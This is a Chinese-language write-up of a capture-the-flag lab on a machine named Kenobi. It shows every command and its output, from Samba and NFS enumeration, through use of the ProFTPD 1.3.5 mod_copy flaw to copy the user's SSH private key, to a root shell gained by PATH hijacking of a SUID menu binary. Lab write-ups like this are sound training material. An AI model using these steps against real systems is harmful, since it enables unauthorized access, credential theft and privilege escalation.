前言
- 利用Linux机器的演练:枚举Samba的共享,操作proftpd的一个易受攻击的版本,并通过路径变量操作来提升权限。
部署
-
target machine: 10.10.14.7
-
attack machine: 10.10.156.25 (Attack Box)
Nmap扫描
nmap -sV -vv --script=vuln TARGET_IP
-
端口主要扫描结果:
root@ip-10-10-156-25:~# nmap -sV -vv --script=vuln 10.10.14.7 Starting Nmap 7.60 ( https://nmap.org ) at 2023-11-29 12:49 GMT ··· Discovered open port 139/tcp on 10.10.14.7 Discovered open port 22/tcp on 10.10.14.7 Discovered open port 111/tcp on 10.10.14.7 Discovered open port 80/tcp on 10.10.14.7 Discovered open port 21/tcp on 10.10.14.7 Discovered open port 445/tcp on 10.10.14.7 Discovered open port 2049/tcp on 10.10.14.7 ··· PORT STATE SERVICE REASON VERSION 21/tcp open ftp syn-ack ttl 64 ProFTPD 1.3.5 |_sslv2-drown: 22/tcp open ssh syn-ack ttl 64 OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0) 80/tcp open http syn-ack ttl 64 Apache httpd 2.4.18 ((Ubuntu)) |_http-csrf: Couldn't find any CSRF vulnerabilities. |_http-dombased-xss: Couldn't find any DOM based XSS. | http-enum: | /admin.html: Possible admin folder |_ /robots.txt: Robots file |_http-litespeed-sourcecode-download: Request with null byte did not work. This web server might not be vulnerable |_http-server-header: Apache/2.4.18 (Ubuntu) | http-slowloris-check: | VULNERABLE: | Slowloris DOS attack | State: LIKELY VULNERABLE | IDs: CVE:CVE-2007-6750 | Slowloris tries to keep many connections to the target web server open and hold | them open as long as possible. It accomplishes this by opening connections to | the target web server and sending a partial request. By doing so, it starves | the http server's resources causing Denial Of Service. | | Disclosure date: 2009-09-17 | References: | http://ha.ckers.org/slowloris/ |_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750 |_http-stored-xss: Couldn't find any stored XSS vulnerabilities. |_http-wordpress-users: [Error] Wordpress installation was not found. We couldn't find wp-login.php 111/tcp open rpcbind syn-ack ttl 64 2-4 (RPC #100000) | rpcinfo: | program version port/proto service | 100000 2,3,4 111/tcp rpcbind | 100000 2,3,4 111/udp rpcbind | 100003 2,3,4 2049/tcp nfs | 100003 2,3,4 2049/udp nfs | 100005 1,2,3 34504/udp mountd | 100005 1,2,3 47091/tcp mountd | 100021 1,3,4 43795/tcp nlockmgr | 100021 1,3,4 52986/udp nlockmgr | 100227 2,3 2049/tcp nfs_acl |_ 100227 2,3 2049/udp nfs_acl 139/tcp open netbios-ssn syn-ack ttl 64 Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 445/tcp open netbios-ssn syn-ack ttl 64 Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 2049/tcp open nfs_acl syn-ack ttl 64 2-3 (RPC #100227) MAC Address: 02:4D:3C:60:87:8D (Unknown) Service Info: Host: KENOBI; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel Host script results: |_smb-vuln-ms10-054: false |_smb-vuln-ms10-061: false |_smb-vuln-ms17-010: This system is patched. | smb-vuln-regsvc-dos: | VULNERABLE: | Service regsvc in Microsoft Windows systems vulnerable to denial of service | State: VULNERABLE | The service regsvc in Microsoft Windows 2000 systems is vulnerable to denial of service caused by a null deference | pointer. This script will crash the service if it is vulnerable. This vulnerability was discovered by Ron Bowes | while working on smb-enum-sessions. |_ ···
枚举SMB共享:
-
由上可以看到SMB涉及到两个端口:139和445
-
SMB枚举:
nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse target_ip或者nmap -p 139 --script=smb-enum-shares.nse,smb-enum-users.nse target_iproot@ip-10-10-156-25:~# nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse 10.10.14.7 ··· Host script results: | smb-enum-shares: | account_used: guest | \\10.10.14.7\IPC$: | Type: STYPE_IPC_HIDDEN | Comment: IPC Service (kenobi server (Samba, Ubuntu)) | Users: 2 | Max Users: <unlimited> | Path: C:\tmp | Anonymous access: READ/WRITE | Current user access: READ/WRITE | \\10.10.14.7\anonymous: | Type: STYPE_DISKTREE | Comment: | Users: 0 | Max Users: <unlimited> | Path: C:\home\kenobi\share | Anonymous access: READ/WRITE | Current user access: READ/WRITE | \\10.10.14.7\print$: | Type: STYPE_DISKTREE | Comment: Printer Drivers | Users: 0 | Max Users: <unlimited> | Path: C:\var\lib\samba\printers | Anonymous access: <none> |_ Current user access: <none> -
查看远程服务器共享的目录:
root@ip-10-10-156-25:~# smbclient //10.10.14.7/anonymous WARNING: The "syslog" option is deprecated Enter WORKGROUP\root's password: Try "help" to get a list of possible commands. smb: \> ls . D 0 Wed Sep 4 11:49:09 2019 .. D 0 Wed Sep 4 11:56:07 2019 log.txt N 12237 Wed Sep 4 11:49:09 2019 9204224 blocks of size 1024. 6876728 blocks available smb: \> -
递归下载SMB共享文件:
root@ip-10-10-156-25:~# smbget -R smb://10.10.14.7/anonymous Password for [guest] connecting to //anonymous/10.10.14.7: Using workgroup WORKGROUP, user guest smb://10.10.14.7/anonymous/log.txt Downloaded 11.95kB in 9 seconds root@ip-10-10-156-25:~# ls CTFBuilder Desktop Downloads Instructions log.txt Pictures Postman Rooms Scripts thinclient_drives Tools -
查看下载的文件log.txt:
cat log.txt+ 为用户生成SSH密钥时为Kenobi生成的信息 + ProFTPD服务器信息 ``` # This is a basic ProFTPD configuration file (rename it to # 'proftpd.conf' for actual use. It establishes a single server # and a single anonymous login. It assumes that you have a user/group # "nobody" and "ftp" for normal operation and anon. ServerName "ProFTPD Default Installation" ServerType standalone DefaultServer on # Port 21 is the standard FTP port. Port 21 # Don't use IPv6 support by default. UseIPv6 off # Umask 022 is a good standard umask to prevent new dirs and files # from being group and world writable. Umask 022 ··· ```
利用ProFtpd漏洞获取初步权限:
-
之前的nmap端口扫描将显示运行rpcbind服务的端口111。这只是一个将远程过程调用(RPC)程序号转换为通用地址的服务器。当一个RPC服务启动时,它告诉RPC绑定它正在监听的地址和它准备服务的RPC程序号。
这里,端口111是对网络文件系统的访问,使用nmap来枚举它:
root@ip-10-10-156-25:~# nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount 10.10.14.7 Starting Nmap 7.60 ( https://nmap.org ) at 2023-11-29 13:44 GMT Nmap scan report for ip-10-10-14-7.eu-west-1.compute.internal (10.10.14.7) Host is up (0.00016s latency). PORT STATE SERVICE 111/tcp open rpcbind | nfs-ls: Volume /var | access: Read Lookup NoModify NoExtend NoDelete NoExecute | PERMISSION UID GID SIZE TIME FILENAME | rwxr-xr-x 0 0 4096 2019-09-04T08:53:24 . | rwxr-xr-x 0 0 4096 2019-09-04T12:27:33 .. | rwxr-xr-x 0 0 4096 2019-09-04T12:09:49 backups | rwxr-xr-x 0 0 4096 2019-09-04T10:37:44 cache | rwxrwxrwt 0 0 4096 2019-09-04T08:43:56 crash | rwxrwsr-x 0 50 4096 2016-04-12T20:14:23 local | rwxrwxrwx 0 0 9 2019-09-04T08:41:33 lock | rwxrwxr-x 0 108 4096 2019-09-04T10:37:44 log | rwxr-xr-x 0 0 4096 2019-01-29T23:27:41 snap | rwxr-xr-x 0 0 4096 2019-09-04T08:53:24 www |_ | nfs-showmount: |_ /var * | nfs-statfs: | Filesystem 1K-blocks Used Available Use% Maxfilesize Maxlink |_ /var 9204224.0 1836904.0 6876724.0 22% 16.0T 32000/var可看做是一个挂载
-
之前SMB共享文件下载有ProFtpd信息,而ProFtpd是一个免费的开源FTP服务器,兼容Unix和Windows系统。在过去的软件版本中,它也很容易受到攻击,可以通过ProFtpd获取权限:
- 获取服务版本:
root@ip-10-10-156-25:~# nc 10.10.14.7 21 220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [10.10.14.7]- 查找版本漏洞:
root@ip-10-10-156-25:~# searchsploit ProFTPD 1.3.5 ---------------------------------------------------------------------------------------------------------------------- --------------------------------- Exploit Title | Path ---------------------------------------------------------------------------------------------------------------------- --------------------------------- ProFTPd 1.3.5 - 'mod_copy' Command Execution (Metasploit) | linux/remote/37262.rb ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution | linux/remote/36803.py ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution (2) | linux/remote/49908.py ProFTPd 1.3.5 - File Copy | linux/remote/36742.txt ---------------------------------------------------------------------------------------------------------------------- --------------------------------- Shellcodes: No Results-
ProFTPD 1.3.5的漏洞在mod_copy模块中:
mod_copy模块实现了SITE CPFR和SITE CPTO命令,可用于将文件/目录从服务器上的一个位置复制到另一个位置。任何未经身份验证的客户机都可以利用这些命令将文件从文件系统的任何部分复制到选定的目的地。
-
FTP服务以Kenobi用户的身份运行(从共享上的文件),并为该用户生成ssh密钥。可以利用mod_copy的SITE CPFR和SITE CPTO命令复制Kenobi的私钥:
root@ip-10-10-156-25:~# nc 10.10.14.7 21 220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [10.10.14.7] SITE CPFR /home/kenobi/.ssh/id_rsa 350 File or directory exists, ready for destination name SITE CPTO /var/tmp/id_rsa 250 Copy successful- 现在已经将Kenobi的私钥移到了/var/tmp目录中,可以将/var/tmp挂载到attack机器上:
root@ip-10-10-156-25:~# mkdir /mnt/kenobiNFS root@ip-10-10-156-25:~# mount 10.10.14.7:/var /mnt/kenobiNFS root@ip-10-10-156-25:~# ls -la /mnt/kenobiNFS total 56 drwxr-xr-x 14 root root 4096 Sep 4 2019 . drwxr-xr-x 3 root root 4096 Nov 29 14:14 .. drwxr-xr-x 2 root root 4096 Sep 4 2019 backups drwxr-xr-x 9 root root 4096 Sep 4 2019 cache drwxrwxrwt 2 root root 4096 Sep 4 2019 crash drwxr-xr-x 40 root root 4096 Sep 4 2019 lib drwxrwsr-x 2 root staff 4096 Apr 12 2016 local lrwxrwxrwx 1 root root 9 Sep 4 2019 lock -> /run/lock drwxrwxr-x 10 root lxd 4096 Sep 4 2019 log drwxrwsr-x 2 root mail 4096 Feb 26 2019 mail drwxr-xr-x 2 root root 4096 Feb 26 2019 opt lrwxrwxrwx 1 root root 4 Sep 4 2019 run -> /run drwxr-xr-x 2 root root 4096 Jan 29 2019 snap drwxr-xr-x 5 root root 4096 Sep 4 2019 spool drwxrwxrwt 6 root root 4096 Nov 29 14:10 tmp drwxr-xr-x 3 root root 4096 Sep 4 2019 www -
获取私匙并登录:
root@ip-10-10-156-25:/# cp /mnt/kenobiNFS/tmp/id_rsa . root@ip-10-10-156-25:/# chmod 600 id_rsa root@ip-10-10-156-25:/# ssh -i id_rsa kenobi@10.10.14.7 ··· kenobi@kenobi:~$ cd /home kenobi@kenobi:/home$ ls kenobi kenobi@kenobi:/home$ cd kenobi/ kenobi@kenobi:~$ ls share user.txt利用路径变量操作进行权限升级:
-
SUID位可能很危险,一些二进制文件,如passwd,需要以更高的权限运行(因为它在系统上重置您的密码),但是其他自定义文件可能具有SUID位,可能会导致各种各样的问题。
-
查找SUID文件:
find / -perm -u=s -type f 2>/dev/nullkenobi@kenobi:~$ find / -perm -u=s -type f 2>/dev/null /sbin/mount.nfs /usr/lib/policykit-1/polkit-agent-helper-1 /usr/lib/dbus-1.0/dbus-daemon-launch-helper /usr/lib/snapd/snap-confine /usr/lib/eject/dmcrypt-get-device /usr/lib/openssh/ssh-keysign /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic /usr/bin/chfn /usr/bin/newgidmap /usr/bin/pkexec /usr/bin/passwd /usr/bin/newuidmap /usr/bin/gpasswd /usr/bin/menu /usr/bin/sudo /usr/bin/chsh /usr/bin/at /usr/bin/newgrp /bin/umount /bin/fusermount /bin/mount /bin/ping /bin/su /bin/ping6 -
/usr/bin/menu 比较特别,运行一下:
tips: 这里重新部署了下target和attack机器,之前的操作一样:
-
target machine: 10.10.1.230
-
attack machine: 10.10.248.22 (Attack Box)
kenobi@kenobi:~$ /usr/bin/menu *************************************** 1. status check 2. kernel version 3. ifconfig ** Enter your choice : ··· -
-
strings 可打印二进制文件中可打印的字符,这里查看/usr/bin/menu运行时的信息:
kenobi@kenobi:~$ cd /tmp kenobi@kenobi:/tmp$ strings /usr/bin/menu /lib64/ld-linux-x86-64.so.2 libc.so.6 setuid __isoc99_scanf puts __stack_chk_fail printf system __libc_start_main __gmon_start__ GLIBC_2.7 GLIBC_2.4 GLIBC_2.2.5 UH-` AWAVA AUATL []A\A]A^A_ *************************************** 1. status check 2. kernel version 3. ifconfig ** Enter your choice : curl -I localhost uname -r ifconfig ···-
观察以上结果可以得知:当我们执行/usr/bin/menu 时,选择选项1其实是在执行一个curl命令,选择选项2其实是在执行uname -r命令。
-
这表明二进制文件curl和uname,是在没有完整路径的情况下运行的(例如没有使用/usr/bin/curl 或/usr/bin/uname运行文件)。
-
我们已经知道/usr/bin/menu文件是一个SUID文件,它在执行时会暂时具有root 用户权限,我们可以尝试自定义创建一个curl文件(并写入/bin/bash,意思是打开一个bash shell),然后我们再给自定义的curl文件附加可执行权限(+x),接着将自定义的curl文件所在的路径添加到PATH变量中(这样能够保证我们自定义的curl文件能够被首先找到)。
-
完成以上操作之后,执行SUID文件/usr/bin/menu,产生的效果是:以root权限打开一个bash shell—–这将获得root shell
kenobi@kenobi:/tmp$ echo /bin/bash > curl kenobi@kenobi:/tmp$ chmod 777 curl kenobi@kenobi:/tmp$ export PATH=/tmp:$PATH kenobi@kenobi:/tmp$ /usr/bin/menu *************************************** 1. status check 2. kernel version 3. ifconfig ** Enter your choice :1 bash: groups: command not found bash: lesspipe: command not found bash: dircolors: command not found root@kenobi:/tmp#
-